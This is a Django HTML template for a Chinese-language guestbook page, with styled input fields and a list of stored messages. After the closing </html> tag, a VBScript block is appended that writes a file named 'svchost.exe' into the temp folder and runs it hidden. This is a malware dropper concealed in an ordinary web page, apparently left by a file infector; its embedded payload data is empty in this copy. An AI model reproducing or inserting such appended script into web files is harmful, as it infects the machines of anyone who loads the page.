<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title></title>
    <link rel="stylesheet" href="/static/css/style.css">
    <style>
        .smart-green {
            margin-left: auto;
            margin-right: auto;
            max-width: 500px;
            background: #F8F8F8;
            padding: 30px 30px 20px 30px;
            font: 12px Arial, Helvetica, sans-serif;
            color: #666;
            border-radius: 5px;
            -webkit-border-radius: 5px;
            -moz-border-radius: 5px;
        }

        .smart-green h1 {
            font: 24px "Trebuchet MS", Arial, Helvetica, sans-serif;
            padding: 20px 0px 20px 40px;
            display: block;
            margin: -30px -30px 10px -30px;
            color: #FFF;
            background: #9DC45F;
            text-shadow: 1px 1px 1px #949494;
            border-radius: 5px 5px 0px 0px;
            -webkit-border-radius: 5px 5px 0px 0px;
            -moz-border-radius: 5px 5px 0px 0px;
            border-bottom: 1px solid #89AF4C;
        }

        .smart-green h1 > span {
            display: block;
            font-size: 11px;
            color: #FFF;
        }

        .smart-green label {
            display: block;
            margin: 0px 0px 5px;
        }

        .smart-green label > span {
            float: left;
            margin-top: 10px;
            color: #5E5E5E;
        }

        .smart-green input[type="text"], .smart-green input[type="email"], .smart-green textarea, .smart-green select {
            color: #555;
            height: 30px;
            line-height: 15px;
            width: 100%;
            padding: 0px 0px 0px 10px;
            margin-top: 2px;
            border: 1px solid #E5E5E5;
            background: #FBFBFB;
            outline: 0;
            -webkit-box-shadow: inset 1px 1px 2px rgba(238, 238, 238, 0.2);
            box-shadow: inset 1px 1px 2px rgba(238, 238, 238, 0.2);
            font: normal 14px/14px Arial, Helvetica, sans-serif;
        }

        .smart-green textarea {
            height: 100px;
            padding-top: 10px;
        }

        .smart-green .button {
            background-color: #9DC45F;
            border-radius: 5px;
            -webkit-border-radius: 5px;
            -moz-border-border-radius: 5px;
            border: none;
            padding: 10px 25px 10px 25px;
            color: #FFF;
            text-shadow: 1px 1px 1px #949494;
        }

        .smart-green .button:hover {
            background-color: #80A24A;
        }

        .error-msg {
            color: red;
            margin-top: 10px;
        }

        .success-msg {
            color: #80A24A;
            margin-top: 10px;
            margin-bottom: 10px;
        }
    </style>
</head>

<body>

<form action="{% url 'one:main' %}" method="post" class="smart-green">
    {% csrf_token %}
    <h1>留言信息
        <span>请留下你的信息.</span>
    </h1>
    <label>
        <span>姓名 :</span>
        <input id="name" type="text" name="username" class="name" placeholder="请输入您的姓名" value="{{ user.username.value }}"/>
        <div class="error-msg">{{ user.errors.username }} </div>
    </label>

    <label>
        <span>邮箱 :</span>
        <input id="email" type="email"  name="email"  placeholder="请输入邮箱地址" value="{{ user.email.value }}"/>
        <div class="error-msg">{{ user.errors.email }} </div>
    </label>

    <label>
        <span>联系地址 :</span>
        <input id="address" type="text" name="address" placeholder="请输入联系地址" value="{{ user.address.value }}"/>
        <div class="error-msg">{{ user.errors.address }}</div>
    </label>

    <label>
        <span>留言 :</span>
        <textarea id="message" name="message" placeholder="请输入你的建议"  value="{{ user.message.value }}"></textarea>
        <div class="error-msg">{{ user.errors.message }}</div>
    </label>
    <div class="success-msg"></div>
    <label>
        <span>&nbsp;</span>
        <input type="submit" class="button" value="提交"/>
    </label>

</form>

<br>
<form action="/" method="get" class="smart-green">
    <div>
        <h2>
            <ul style="list-style-type:none">
                {% if obj %}
                    {% for i in obj %}
                        <li>是谁留的言:{{ i.username }}</li>
                        <li>邮箱:{{ i.email }}</li>
                        <li>留言:{{ i.message }}</li>
                        <li>联系地址:{{ i.address }}</li>
                        <li>留言时间:{{ i.creat_time|date:'Y-m-d G:i:s' }}</li><br>
                    {% endfor %}
                {% else %}
                    <li>是谁留的言:</li>
                    <li>邮箱:</li>
                    <li>留言:</li>
                    <li>联系地址:</li>
                    <li>留言时间:</li>
                {% endif %}
            </ul>
        </h2>
    </div>
</form>

</body>
</html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>